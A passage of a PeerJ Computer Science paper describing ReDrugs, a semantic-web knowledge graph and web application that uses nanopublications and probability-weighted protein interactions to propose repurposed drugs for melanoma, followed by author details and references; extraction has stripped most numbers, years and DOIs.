podofilox has not yet been investigated in melanoma treatments, but preliminary investigations have focused on treating chronic lymphocytic leukemia (shen et al., ) and non-small cell lung cancer (peng et al., ). since these drugs attack mapk and related proteins rather than braf or nras, they can potentially synergize with other treatments (homsi et al., ). bosutinib in particular has been investigated as a synergistic treatment for melanoma (held et al., ). another possible treatment pathway is cxcr inhibition. mouse models suggest that cxcr inhibitors like plerixafor can reduce tumor metastasis and primary tumor growth (d’alterio et al., ). we identify both plerixafor and framycetin (neomycin b) as useful cxcr inhibitors. two pkrca activators, ingenol mebutate and ellagic acid, were also identified. pkrca binds with braf (pardo et al., ), but it is mechanistically unclear how pkrca activation would result in treatment of melanoma. a number of other therapies are also notable. purvalenol can inhibit gsk b, which in turn activates tp . some, but not all, melanomas have tp deactivation (smalley et al., ). nadroparin, a myc inhibitor, may inhibit tumor progression (nagy, turcsik & blaskó, ). more broadly, heparins can potentially inhibit the metastatic process in melanoma and other cancers (maraveyas et al., ). (a) information retrieval by probability threshold(a) information retrieval by probability threshold . . . . . . . . . . . . . . . . . . . . precisionprecision recallrecall f-measuref-measure (b) information retrieval by network expansion step(b) information retrieval by network expansion step . . . . . . precisionprecision recallrecall f-measuref-measure figure precision,recall, and f-measure by(a) varyingthresholds forjoint probability and (b) varying number of interaction steps.precision is the percentage of returned candidates that have been validated experimentally or have been in a clinical trial (a “hit”) versus all candidates returned. recall is the percentage of all known validated “hits.” f-measure is the geometric mean of precision and recall that provides a balanced evaluation of the quality and completeness of the results. mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the approach that we present here offers a novel, mechanism-focused exploration to identify and examine drugs and targets related to cancer. this approach filters our noisy or poorly supported parts of the knowledge graph to identify more confident mechanisms between drugs, targets, and diseases. thus, our approach can be used to explore high confidence associations that are produced as a result of large scale computational screens that use network connectivity (yang & agarwal, ; wu, wang & chen, ; cheng et al., ; emig et al., ; harrold, ramanathan & mager, ; wu et al., ; vogt, prinz & campillos, ), the complementarity in drug-disease gene expression, and the similarity of chemical fingerprints, side-effects, targets, or indications (yang & agarwal, ; ye, liu & wei, ; chiang & butte, ; gottlieb et al., ; lamb et al., ; sirota et al., ). importantly, since we focus on protein networks that are strongly linked with diseases, we believe that our mechanism focused approach will also aid in the identification of disease-modifying drug candidates, rather than solely those that would be useful for the treatment of symptomatic phenotypes or related co-morbid conditions. architecture redrugs uses a fairly straightforward web architecture, as shown in fig. . it uses the blazegraph rdf database backend. the database layer is interchangeable except that the full text search service needs to use blazegraph-only properties to perform text searches as text indexing is not yet standardized in the sparql query language. all other aspects are standardized and should work with other rdf databases without modification. redrugs currently uses the python-based turbogears web application framework hosted using the web services gateway interface standard via an apache http server. turbogears in turn hosts the semantic automated discovery and integration (sadi) web services that drive the application and access the database. it also serves up the static html and supporting files. rdf store python + apache web server /api/search /api/upstream /api/downstream javascript web client cytoscape.js javascript web client sparql json-ld figure the redrugs software architecture. using web standards and a three-layer architecture (rdf store, web server, and rich web client), we were able to build a complete knowledge graph analysis platform. mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the user interface is implemented with angularjs and cytoscape.js, which submits queries to the sadi web services using json-ld and aggregates results into the networked view. the software relies exclusively on standardized protocols (http, sadi, sparql, rdf, and others) to make it simple to replace technologies as needed. the data itself is processed using conversion scripts as shown in fig. . we have also adapted and featured redrugs in an immersive visualization laboratory called the collaborative-research augmented immersive virtual environment (craive) lab at rpi, as shown in fig. . the goal of the demonstration was to explore new ways to visualize, sonify, and interact with big data in large-scale virtual reality systems. we also leveraged a gesture controller (microsoft kinect) to interact with the visualization. with the � projection, multiple people can explore the visualization concurrently, which accelerates the exploration and discovery speed. limitations and future work our study has a some limitations. first, our study is limited by the sources of data used. we used three databases (drugbank, irefindex, and online mendelian inheritance in man (omim)) to construct the initial knowledge graph. these databases are continuously changing and necessarily incomplete with respect to the total number of drugs, targets, protein interactions, diseases, and disease genes. for instance, as of / / there are over , additional fda approved drugs in drugbank than in the version that was initially used. second, the focus of our work is on the potential repositioning of fda redrugs api interaction network search and expansion irefindex redrugs rdf store analytical tools redrugs cytoscape.js app ontological resources protein/protein interaction ontology, semanticscience integrated ontology, gene ontology vocabularies, relationships queries queries graphqueries graph ii experimental method assessment experimental methods. evidence to probabilityconverted to nanopubs cytoscape, r, python, etc. figure the redrugs data flow. data is selected from external databases and converted using scripts into nanopublication graphs, which are loaded into the redrugs data store. this is combined with experimental method assessments, expressed in owl, and public ontologies into the rdf store. the web service layer queries the store and produces aggregate analyses of those nanopublications, which is con- sumed and displayed by the rich web client. the same apis can be used by other tools for further analysis. mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ approved drugs, which means that tens of thousands of chemical compounds with protein binding activity cannot be considered as candidates in the current study. third, our path expansion is currently limited to pairwise protein–protein interactions, which excludes interactions as a result of protein complexes or regulatory pathways. having a more sophisticated understanding of non-direct interactions will help identify candidate drugs that can regulate entire pathways in a more rational manner. additionally, we aim to incorporate knowledge of the complementarity of drug and disease gene expression patterns as evidenced by the connectivity map (lamb et al., ), which could suggest therapeutic and adverse interactions. finally, as we develop new hypotheses about potential new drug effects, we plan to test them using a new three-dimensional cellular microarray to perform high-throughput drug screening (lee et al., ) with reference samples. the integration of computational predictions and high-throughput screening platform will enable the systematic evaluation of any drug or mechanism of action against any disease or adverse event. materials and methods this research project did not involve human subjects. the redrugs platform consists of a graphical web application, an application programming interface (api), and a knowledge base. the graphical web application enables users to initiate a search using drug, gene, and disease names and synonyms. users can then interact with the application to expand the network at an arbitrary number of interactions away from the entity of interest, and to filter the network based on a joint probability between the source and target entities. drug–protein, protein–protein, and gene–disease interactions were obtained from several datasets and integrated into ontology-annotated and provenance and evidence bearing representations called nanopublications. the web application obtains information from the knowledge base using semantic web services. finally, we evaluated our approach by figure the authors demonstrate the redrugs user interface in the collaborative-research augmented immersive virtual environment (craive) lab at rpi. mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ examining the mechanistic plausibility of the drug in having melanoma-specific disease modifying ability. we evaluated a large number of possible drug/disease associations with varying joint probabilities and interaction steps to determine the thresholds with the highest f-measure, resulting in our thresholds of three or less interactions and a joint probability of . or higher. using the redrugs application page (http://redrugs.tw.rpi.edu) we initiate our search for “melanoma,” and select the first suggestion obtained from the experimental factor ontology (efo) (http://www.ebi.ac.uk/efo/efo_ ). the application then provides immediate neighborhood of drugs and genes that are associated with melanoma. we expanded the network by first selecting the melanoma node and expanding the link distance to |i| � and changing the minimum joint probability to p � . in the search options. importantly, we also limit the node type to “drug.” finally, we click on the “find incoming links” button (two left-facing arrows). when finished the network will show all drugs interacting with melanoma that meet the above criteria, as well as any intervening entities and their interactions. the resulting network can be downloaded as an image, or a summary csv file. we used the csv file to validate the links by searching google scholar and clinicaltrials.gov for each proposed drug/disease combination. we consider a “hit” to be a pairing with a published positive experiment in vivo or in vitro or any pairing that has been tested in a clinical trial. while this level of validation does not guarantee efficacy, it does determine if the resulting connection is a plausible hypothesis that might be tested. data fusion we developed a structured knowledge base containing data pertaining to drugs, targets, interactions, and diseases. we used five data sources: irefindex (razick, magklaras & donaldson, ), drugbank (wishart et al., ), uniprot gene ontology annotations (goa) (camon et al., ), the online mendelian inheritance in man (omim) (hamosh et al., ), and the catalogue of somatic mutations in cancer (cosmic) gene census (futreal et al., ). irefindex contains protein–protein interactions and protein complexes and is an amalgam of the biomolecular interaction network database (bader, betel & hogue, ), biogrid (stark et al., ), the comprehensive resource of mammalian protein complexes (ruepp et al., ), database of interacting proteins (xenarios et al., ), human protein reference database (keshava prasad et al., ), innatedb (lynn et al., ), intact (kerrien et al., ), matrixdb (chautard et al., ), molecular interaction database (chatr-aryamontri et al., ), mpact (güldener et al., ), microbial protein interaction database (goll et al., ), mips mammalian protein–protein interaction database (pagel et al., ), and online predicted human interaction database (brown & jurisica, ). drugbank provides information about experimental/approved drugs and their targets, and uniprot goa describes proteins in terms of their biological processes, cellular locations, and molecular functions. omim provides associations between genes and inherited or genetically-driven diseases. the cosmic gene census is a curated list of genes that have causal associations with one or more cancer types. mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://redrugs.tw.rpi.edu http://www.ebi.ac.uk/efo/efo_ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ each association (e.g., drug–target, protein–protein, disease–gene) was captured using the nanopublication (groth, gibson & velterop, ) scheme. a nanopublication is a digital artifact that consists of an assertion, its provenance, and information about the digital publication. our nanopublications are represented as linked data: each data item is identified using an dereferenceable http uniform resource identifier (uri) and statements are represented using the rdf. each nanopublication corresponds to a single interaction assertion from one of the databases. we used a number of automated scripts to produce the nanopublications and load them into the sparql endpoint. an example nanopublication is shown in fig. . we used the sio (dumontier et al., ) as a global schema to describe the nature and components of the associations, and coupled this with the psi-mi ontology (hermjakob et al., ) to denote the types of interactions. we used the w c’s prov-o (lebo, sahoo & mcguinness, ) to capture provenance of the assertion (which data source it originated from). we loaded our nanopublications into blazegraph, an rdf nanopublication compatible database. the data is accessed using its native sparql endpoint by the web application. assertion probability each knowledge graph fragment, enclosed in a nanopublication, is assigned a probability based on the quality of the methods used to create the assertions in the fragment. we compute probabilities based on two different methods. manually curated assertions, from drugbank, omim, and cosmic gene census, are directly given a probability p = . . assertions that have been derived from a specific experimental method are given probabilities appropriate for that method. these probabilities are derived from a expert-driven measure of the reliability of the experimental method used to derive the association. factors involved in the assessment of confidence include the degree of indirection in the assay, the sensitivity and specificity of the approach, and reproducibility of results under different conditions based on the comparative analyses of techniques (skrabanek et al. ; sprinzak, sattath & margalit, ). two expert bioinformaticians rated the reliability of each method and assigned a score of – , where corresponds to low confidence and to high confidence. after their initial assessment, they conferred on their reasoning for each score to resolve differences where possible. the experts considered level to correspond to weak evidence that needs independent verification. level methods are generally reliable, but should have additional biological evidence. level methods are high-quality method that produces few false positives. we calculated inter-annotator agreement between the two annotators over the three categories using scott’s pi. scott’s pi is similar to cohen’s kappa in that it improves on simple observed agreement by factoring in the extent of agreement that might be expected by chance. we determined the agreement to be . (scott’s pi value of . ) across experimental methods comprising of . % of interaction annotations (scott, ). the scores of , , and were then assigned provisional probabilities of p = . , p = . , and p = . respectively. we chose these probabilities as approximations of the conceptual levels of probability for each rating by the experts, and feel that those probabilities correspond to how often an experiment at that confidence level can be expected to be mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ accurate. we plan to provide a more rigorous assessment of the accuracy of each method against gold standards in future work. these confidence values were encoded into an owl ontology along with the evidence codes. the full inferences were extracted using pellet (https://github.com/complexible/pellet) and loaded into the sparql endpoint, where they were used to apply the probabilities to each assertion in the knowledge graph that had experimental evidence. semantic web services we developed four sadi web services (wilkinson, vandervalk & mccarthy, ) in python to support easy access to the nanopubications (see table ) in redrugs. the four services are enumerated in table . the first service is a simple free text lookup, that takes an pml:query (mcguinness et al., ) with a prov:value as a query and produces a set of entities whose labels contain the substring. this is used for interactive typeahead completion of search terms so users can look up uris and entities without needing to know the details. the other three sadi services look up interactions that contain a named entity. two of them look at the entity to find upstream and downstream connections, and the third service assumes that the entity is a biological process and finds all interactions that related to that process. the services return only one interaction for each triple (source, interaction type, target). there are often multiple probabilities per interaction, and more than one interaction per interaction type. this is because the interaction may have been recorded in multiple databases, based on different experimental methods. figure representation of a protein/protein interaction within a nanopublication. three graphs are represented. the assertion graph (nanopub_ _assertion), states that an interaction (x) is of type sio:directinteraction, and has the target of slc a , and a participant of ca . the supporting graph (nanopub_ _supporting), states that the assertion graph was generated by a pull down experi- ment (one of many encoded experiment types used in, a subclass of prov:activity. the attribution graph (nanopub_ _attribution), in turn, states that the assertion had a primary source of (loiselle et al., ) and that the interaction was quoted from biogrid. for further information on developing web services in python using sadi, see this tutorial: https://github.com/ markwilkinson/sadi-semantic-web- services-core/wiki/building-services- in-python pml , in development: https://github. com/timrdf/pml. this includes pml constructs that are not covered in prov-o. mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/complexible/pellet https://github.com/markwilkinson/sadi-semantic-web-services-core/wiki/building-services-in-python https://github.com/markwilkinson/sadi-semantic-web-services-core/wiki/building-services-in-python https://github.com/markwilkinson/sadi-semantic-web-services-core/wiki/building-services-in-python https://github.com/markwilkinson/sadi-semantic-web-services-core/wiki/building-services-in-python https://github.com/timrdf/pml https://github.com/timrdf/pml http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to provide a single probability score for each interaction of a source and target, the interactions are combined. a single probability is generated per identified interaction by taking the geometric mean of the probabilities for that interaction. however, this method is undesirable when combining multiple interaction records of the same type. we instead combine the interaction records using a form of probabilistic voting using composite z-scores. this is done to model that multiple experiments that produce the same results reinforce each other, and should therefore give a higher overall probability than would be indicated by taking their mean or even by bayes theorem. we do this by converting each probability into a z-score (aka standard score) using the quantile function (q()), summing the values, and applying the cumulative distribution function (cdf()) to compute the corresponding probability: p x ...nð Þ ¼ cdf xn i¼ q p xið Þð Þ ! these composite z-scores, which we transform back into probabilities, are frequently used to combine multiple indicators of the same underlying phenomena, as in (moller et al., ). however, it has a drawback. one concern is that the strategy does not account for multiple databases recording the same non-independent experiment. this can possibly inflating the probabilities of interactions described by experiments that are published in more than one database. graph expansion using joint probability in order to compute the probability that a given entity affects another, we compute the joint probability that each of the intervening interactions are true. joint probability is the probability that every assertion in the set is true. this is computed by taking the product of probabilities of each interaction: p x ^ . . . ^ xnð Þ ¼ yn i¼ p xið Þ this joint probability is used as a threshold that users can set to stop graph expansion. we also provide expansion limits using the number of interaction steps that are needed to connect the two entities. table redrugs api sadi web services. the api endpoint prefix is http://redrugs.tw.rpi.edu/api/. service name description url input output resource text search look up resources using free text search against their rdfs labels. this service is optimized for typeahead user interfaces. search pml:query pml:answeredquery find interactions in a biological process find interactions whose participants or targets also participate in the input process. process sio:process sio:process find upstream participants find interactions that the input entity is a target of in and have explicit participants. upstream sio:materialentity sio:target find downstream targets find interactions that the input entity participates in and have explicit targets. downstream sio:materialentity sio:agent mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://redrugs.tw.rpi.edu/api/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ user interface the user interface was developed using the above sadi web services and uses cytoscape.js (http://cytoscape.github.io/cytoscape.js) angular.js (https://angularjs.org), and bootstrap (http://getbootstrap.com). an example network is shown in fig. . users can search for biological entities and processes, which can then be autocompleted to specific entities that are in the redrugs graph. users can then add those entities and processes to the displayed graph and retrieve upstream and downstream connections and link out to more details for every entity. cytoscape.js is used as the main rendering and network visualization tool, and provides node and edge rendering, layout, and network analysis capabilities, and has been integrated into a customized rich web client. in order to evaluate this knowledge graph, we developed a demonstration web interface (http://redrugs.tw.rpi.edu) based on the cytoscape.js (http://cytoscape.github.io/ cytoscape.js) javascript library. the interface lets users enter biological entity names. as the user types, the text is resolved to a list of entities. the user finishes by selecting from the list, and submitting the search. the search returns interactions and nodes associated with the entity selected, which are added to the cytoscape.js graph. users are also able to select nodes and populate upstream or downstream connections. figure is an example output of this process. acknowledgements a special thanks to pascale gaudet who, with michel dumontier, evaluated the experimental methods and evidence codes listed in the protein/protein interaction ontology and gene ontology. thank you also to kusum solanki and john erickson for evaluation, feedback, and planning in the initial stages of this project. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � james p. mccusker conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. � michel dumontier conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. � rui yan performed the experiments, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://cytoscape.github.io/cytoscape.js https://angularjs.org http://getbootstrap.com http://redrugs.tw.rpi.edu http://cytoscape.github.io/cytoscape.js http://cytoscape.github.io/cytoscape.js http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � sylvia he contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. � jonathan s. dordick conceived and designed the experiments, reviewed drafts of the paper. � deborah l. mcguinness conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. data deposition the following information was supplied regarding data availability: data can be found at https://data.rpi.edu/xmlui/handle/ / . references bader gd, betel d, hogue cw. . bind: the biomolecular interaction network database. nucleic acids research ( ): – doi . /nar/gkg . barth a, wanek l, morton d. . prognostic factors in , melanoma patients with distant metastases. journal of the american college of surgeons ( ): – . bisgin h, liu z, fang h, kelly r, xu x, tong w. . a phenome-guided drug repositioning through a latent variable model. bmc bioinformatics ( ): doi . / - - - . bisgin h, liu z, kelly r, fang h, xu x, tong w. . investigating drug repositioning opportunities in fda drug labels through topic modeling. bmc bioinformatics (suppl ):s doi . / - - -s -s . brown kr, jurisica i. . online predicted human interaction database. bioinformatics ( ): – doi . /bioinformatics/bti . camon e, magrane m, barrell d, lee v, dimmer e, maslen j, binns d, harte n, lopez r, apweiler r. . the gene ontology annotation (goa) database: sharing knowledge in uniprot with gene ontology. nucleic acids research (suppl ):d –d doi . /nar/gkh . chapman pb, hauschild a, robert c, haanen jb, ascierto p, larkin j, dummer r, garbe c, testori a, maio m, hogg d, lorigan p, lebbe c, jouary t, schadendorf d, ribas a, o’day sj, sosman ja, kirkwood jm, eggermont am, dreno b, nolop k, li j, nelson b, hou j, lee rj, flaherty kt, mcarthur ga. . improved survival with vemurafenib in melanoma with braf v e mutation. new england journal of medicine ( ): – . chatr-aryamontri a, zanzoni a, ceol a, cesareni g. . searching the protein interaction space through the mint database. in: thompson jd, ueffing m, schaeffer-reiss c, eds. functional proteomics: methods and protocols. totowa: humana press, – doi . / - - - - _ . chautard e, fatoux-ardore m, ballut l, thierry-mieg n, ricard-blum s. . matrixdb, the extracellular matrix interaction database. nucleic acids research (suppl ):d –d doi . /nar/gkq . cheng f, liu c, jiang j, lu w, li w, liu g, zhou w, huang j, tang y. . prediction of drug- target interactions and drug repositioning via network-based inference. plos computational biology ( ):e doi . /journal.pcbi. . chiang ap, butte aj. . systematic evaluation of drug-disease relationships to identify leads for novel drug uses. clinical pharmacology and therapeutics ( ): – doi . /clpt. . . mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://data.rpi.edu/xmlui/handle/ / http://dx.doi.org/ . /nar/gkg http://dx.doi.org/ . / - - - http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /bioinformatics/bti http://dx.doi.org/ . /nar/gkh http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /nar/gkq http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /clpt. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ clavo a, wahl r. . effects of hypoxia on the uptake of tritiated thymidine, l-leucine, l-methionine and fdg in cultured cancer cells. journal of nuclear medicine : – . d’alterio c, barbieri a, portella l, palma g, polimeno m, riccio a, ieranò c, franco r, scognamiglio g, bryce j, luciano a, rea d, arra c, scala s. . inhibition of stromal cxcr impairs development of lung metastases. cancer immunology immunotherapy ( ): – doi . /s - - - . doudican n, rodriguez a, osman i, orlow sj. . mebendazole induces apoptosis via bcl- inactivation in chemoresistant melanoma cells. molecular cancer research ( ): – doi . / - .mcr- - . dumontier m, baker cj, baran j, callahan a, chepelev l, cruz-toledo j, del rio nr, duck g, furlong li, keath n, klassen d, mccusker jp, queralt-rosinach n, samwald m, villanueva-rosales n, wilkinson md, hoehndorf r. . the semanticscience integrated ontology (sio) for biomedical research and knowledge discovery. journal of biomedical semantics ( ): doi . / - - - . emig d, ivliev a, pustovalova o, lancashire l, bureeva s, nikolsky y, bessarabova m. . drug target prediction and repositioning using an integrated network-based approach. plos one ( ):e doi . /journal.pone. . fiorentini g, aliberti c, del ca, tilli m, rossi s, ballardini p, turrisi g, benea g. . intra-arterial hepatic chemoembolization (tace) of liver metastases from ocular melanoma with slow-release irinotecan-eluting beads. early results of a phase ii clinical study. in vivo ( ): – . futreal pa, coin l, marshall m, down t, hubbard t, wooster r, rahman n, stratton mr. . a census of human cancer genes. nature reviews cancer ( ): – doi . /nrc . goll j, rajagopala sv, shiau sc, wu h, lamb bt, uetz p. . mpidb: the microbial protein interaction database. bioinformatics ( ): – doi . /bioinformatics/btn . gottlieb a, stein g, ruppin e, sharan r. . predict: a method for inferring novel drug indications with application to personalized medicine. molecular systems biology : doi . /msb. . . greenberg lh. . audiotoxicity and nephrotoxicity due to orally administered neomycin. jama ( ): – doi . /jama. . . . groth p, gibson a, velterop j. . the anatomy of a nanopublication. information services and use ( ): – . grover mp, ballouz s, mohanasundaram ka, george ra, sherman cdh, crowley tm, wouters ma. . identification of novel therapeutics for complex diseases from genome- wide association data. bmc medical genomics (suppl ):s doi . / - - -s -s . güldener u, münsterkötter m, oesterheld m, pagel p, ruepp a, mewes h-w, stümpflen v. . mpact: the mips protein interaction resource on yeast. nucleic acids research (suppl ):d –d doi . /nar/gkj . hamosh a, scott af, amberger js, bocchini ca, mckusick va. . online mendelian inheritance in man (omim), a knowledgebase of human genes and genetic disorders. nucleic acids research (suppl ):d –d . harris s, seaborne a, prud’hommeaux e. . sparql . query language. w c recommendation, . available at https://www.w .org/tr/sparql -query/. harrold jm, ramanathan m, mager de. . network-based approaches in drug discovery and early development. clinical pharmacology and therapeutics ( ): – doi . /clpt. . . mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - .mcr- - http://dx.doi.org/ . / - - - http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /nrc http://dx.doi.org/ . /bioinformatics/btn http://dx.doi.org/ . /msb. . http://dx.doi.org/ . /jama. . . http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /nar/gkj https://www.w .org/tr/sparql -query/ http://dx.doi.org/ . /clpt. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ hauschild a, grob j-j, demidov lv, jouary t, gutzmer r, millward m, rutkowski p, blank cu, miller wh, kaempgen e, martn-algarra s, karaszewska b, mauch c, chiarion-sileni v, martin a-m, swann s, haney p, mirakhur b, guckert me, goodman v, chapman pb. . dabrafenib in braf-mutated metastatic melanoma: a multicentre open-label, phase randomised controlled trial. lancet ( ): – doi . /s - ( ) -x. held ma, langdon cg, platt jt, graham-steed t, liu z, chakraborty a, bacchiocchi a, koo a, haskins jw, bosenberg mw, stern df. . genotype-selective combination therapies for melanoma identified by high-throughput drug screening. cancer discovery ( ): – doi . / - .cd- - . hermjakob h, montecchi-palazzi l, bader g, wojcik j, salwinski l, ceol a, moore s, orchard s, sarkans u, von mering c, roechert b, poux s, jung e, mersch h, kersey p, lappe m, li y, zeng r, rana d, nikolski m, husi h, brun c, shanker k, grant sgn, sander c, bork p, zhu w, pandey a, brazma a, jacq b, vidal m, sherman d, legrain p, cesareni g, xenarios i, eisenberg d, steipe b, hogue c, apweiler r. . the hupo psi’s molecular interaction format—a community standard for the representation of protein interaction data. nature biotechnology ( ): – doi . /nbt . homsi j, cubitt cl, zhang s, munster pn, yu h, sullivan dm, jove r, messina jl, daud ai. . src activation in melanoma and src inhibitors as therapeutic agents in melanoma. melanoma research ( ): – doi . /cmr. b e c. humer j, ferko b, waltenberger a, rapberger r, pehamberger h, muster t. . azidothymidine inhibits melanoma cell growth in vitro and in vivo. melanoma research ( ): – doi . /cmr. b e aaaa . istituto clinico humanitas. . regorafenib in patients with metastatic solid tumors who have progressed after standard therapy (resound). available at https://clinicaltrials.gov/ct / show/nct (accessed january ). kerrien s, aranda b, breuza l, bridge a, broackes-carter f, chen c, duesbury m, dumousseau m, feuermann m, hinz u, jandrasits c, jimenez rc, khadake j, mahadevan u, masson p, pedruzzi i, pfeiffenberger e, porras p, raghunath a, roechert b, orchard s, hermjakob h. . the intact molecular interaction database in . nucleic acids research :d –d doi . /nar/gkr . keshava prasad ts, goel r, kandasamy k, keerthikumar s, kumar s, mathivanan s, telikicherla d, raju r, shafreen b, venugopal a, balakrishnan l, marimuthu a, banerjee s, somanathan ds, sebastian a, rani s, ray s, harrys kishore cj, kanth s, ahmed m, kashyap mk, mohmood r, ramachandra yl, krishna v, rahiman ba, mohan s, ranganathan p, ramabadran s, chaerkady r, pandey a. . human protein reference database— update. nucleic acids research (suppl ):d –d doi . /nar/gkn . kim kb, kefford r, pavlick ac, infante jr, ribas a, sosman ja, fecher la, millward m, mcarthur ga, hwu p, gonzalez r, ott pa, long gv, gardner os, ouellet d, xu y, demarini dj, le nt, patel k, lewis kd. . phase ii study of the mek /mek inhibitor trametinib in patients with metastatic braf-mutant cutaneous melanoma previously treated with or without a braf inhibitor. journal of clinical oncology ( ): – doi . /jco. . . . kim s, liu y, gaber mw, bumgardner jd, haggard wo, yang y. . development of chitosan-ellagic acid films as a local drug delivery system to induce apoptotic death of human melanoma cells. journal of biomedical materials research part b: applied biomaterials b( ): – doi . /jbm.b. . mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - ( ) -x http://dx.doi.org/ . / - .cd- - http://dx.doi.org/ . /nbt http://dx.doi.org/ . /cmr. b e c http://dx.doi.org/ . /cmr. b e aaaa https://clinicaltrials.gov/ct /show/nct https://clinicaltrials.gov/ct /show/nct http://dx.doi.org/ . /nar/gkr http://dx.doi.org/ . /nar/gkn http://dx.doi.org/ . /jco. . . http://dx.doi.org/ . /jbm.b. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kingsmore sf, lindquist ie, mudge j, gessler dd, beavis wd. . genome-wide association studies: progress and potential for drug discovery and development. nature reviews drug discovery ( ): – doi . /nrd . kraut eh, walker mj, staubus a, gochnour d, balcerzak sp. . phase ii trial of topotecan in malignant melanoma. cancer investigation ( ): – doi . / . krauthammer m, kong y, bacchiocchi a, evans p, pornputtapong n, wu c, mccusker j, ma s, cheng e, straub r, serin m, bosenberg m, ariyan s, narayan d, sznol m, kluger h, mane s, schlessinger j, lifton r, halaban r. . exome sequencing identifies recurrent mutations in nf and rasopathy genes in sun-exposed melanomas. nature genetics ( ): – doi . /ng. . lamb j, crawford ed, peck d, modell jw, blat ic, wrobel mj, lerner j, brunet j-p, subramanian a, ross kn, reich m, hieronymus h, wei g, armstrong sa, haggarty sj, clemons pa, wei r, carr sa, lander es, golub tr. . the connectivity map: using gene-expression signatures to connect small molecules, genes, and disease. science ( ): – doi . /science. . le k, blomain es, rodeck u, aplin ae. . selective raf inhibitor impairs erk / phosphorylation and growth in mutant nras vemurafenib-resistant melanoma cells. pigment cell & melanoma research ( ): – doi . /pcmr. . lebo t, sahoo s, mcguinness d. . prov-o: the prov ontology. available at http://www.w .org/tr/prov-o/. lee m-y, kumar ra, sukumaran sm, hogg mg, clark ds, dordick js. . three-dimensional cellular microarray for high-throughput toxicology assays. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . lemontt j, azzaria m, gros p. . increased mdr gene expression and decreased drug accumulation in multidrug-resistant human melanoma cells. cancer research ( ): – . loiselle fb, morgan pe, alvarez bv, casey jr. . regulation of the human nbc na + /hco - cotransporter by carbonic anhydrase ii and pka. american journal of physiology-cell physiology ( ):c –c doi . /ajpcell. . . luikart s, kennealey g, kirkwood j. . randomized phase iii trial of vinblastine, bleomycin, and cis-dichlorodiammine-platinum versus dacarbazine in malignant melanoma. journal of clinical oncology ( ): – . lynn dj, winsor gl, chan c, richard n, laird mr, barsky a, gardy jl, roche fm, chan thw, shah n, lo r, naseer m, que j, yau m, acab m, tulpan d, whiteside md, chikatamarla a, mah b, munzner t, hokamp k, hancock rew, brinkman fsl. . innatedb: facilitating systems-level analyses of the mammalian innate immune response. molecular systems biology ( ): doi . /msb. . . mansuy m, nikkels-tassoudji n, arrese je, rorive a, nikkels af. . recurrent in situ melanoma successfully treated with ingenol mebutate. dermatology and therapy ( ): – doi . /s - - - . maraveyas a, johnson mj, xiao yp, noble s. . malignant melanoma as a target malignancy for the study of the anti-metastatic properties of the heparins. cancer and metastasis reviews ( ): – doi . /s - - -y. mcguinness dl, ding l, silva ppd, chang c. . pml : a modular explanation interlingua. in: proceedings of the aaai workshop on explanation-aware computing, vancouver, – . moller jt, cluitmans p, rasmussen ls, houx p, rasmussen h, canet j, rabbitt p, jolles j, larsen k, hanning cd, langeron o, johnson t, lauven pm, kristensen pa, biedler a, van beem h, fraidakis o, silverstein jh, beneken jew, gravenstein js. . long-term mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /nrd http://dx.doi.org/ . / http://dx.doi.org/ . /ng. http://dx.doi.org/ . /science. http://dx.doi.org/ . /pcmr. http://www.w .org/tr/prov-o/ http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /ajpcell. . http://dx.doi.org/ . /msb. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ postoperative cognitive dysfunction in the elderly: ispocd study. lancet ( ): – doi . /s - ( ) - . motik b, patel-schneider pf, cuenca grau b. . owl web ontology language: direct semantics. available at https://www.w .org/tr/owl -direct-semantics/. nagy z, turcsik v, blaskó g. . the effect of lmwh (nadroparin) on tumor progression. pathology & oncology research ( ): – doi . /s - - - . naing a. . phase i dose escalation study of sodium stibogluconate (ssg) a protein tyrosine phosphatase inhibitor, combined with interferon alpha for patients with solid tumors. journal of cancer : – doi . /jca. . . 